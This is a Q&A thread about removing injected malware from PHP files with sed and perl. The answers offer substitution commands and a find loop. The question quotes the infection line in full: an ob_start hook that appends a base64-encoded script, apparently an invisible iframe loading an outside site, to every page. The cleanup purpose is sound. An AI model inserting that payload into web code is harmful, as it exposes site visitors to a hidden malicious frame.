# How to delete lines while preserving certain characters via sed/perl?

Tags: regex, linux, perl, sed, replace

I'm trying to do a mass search and replace on all .php files for the following string for malware cleanup:

```
<?php ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vd3d3Lml3cy1sZWlwemlnLmRlL2NvbnRhY3RzLnBocCI+PC9pZnJhbWU+PC9kaXY+Jyk7PC9zY3JpcHQ+');}
```

I can delete the entire line via `sed '/buffer.base64_decode/d' file.php`. However, I still need the opening `<?php`

So what really needs to be done is a search and replace of `buffer.base64_decode` for `<?php` and my brain is all mashed potatoes after a long day in front of this evil computer.

Or maybe I've thought myself into a tiny box and am going about this all wrong?

Comment: If there's no ending ?> tag on the same line, removing the <?php will result in a broken page (at least partially, assuming it's working right now).  I would replace /<?php ob_start("security_update");.*/<?php/ assuming there's no ending tag on the same line.

Answer (score 0, accepted):

`perl -pe 's/<\?php ob_start\("security_update"\);.*?\?>//gsm; s/<\?php ob_start\("security_update"\);.*/<?php/g;' test.php`

Comment: Thanks, that will get me closer. But it leaves me with no opening `<?php` at the begining of each file which is needed. So what I really need to do is search the above and just replace it with `<?php`

Comment: Yep, accidentally removed more than I meant.  I updated the answer to leave in '<?php' if there's no ending '?>' tag, which was the whole purpose for having two substitutions in the first place.

Answer (score 1):

Instead of deleting the line, you don't you simply *change* it? Here's how, using `GNU sed`:

```
sed -i '/buffer.base64_decode/c \<?php ' file.php
```

Now for all files in your working directory:

```
find . -type f -name "*.php" -exec sed -i '/buffer.base64_decode/c \<?php ' {} \;
```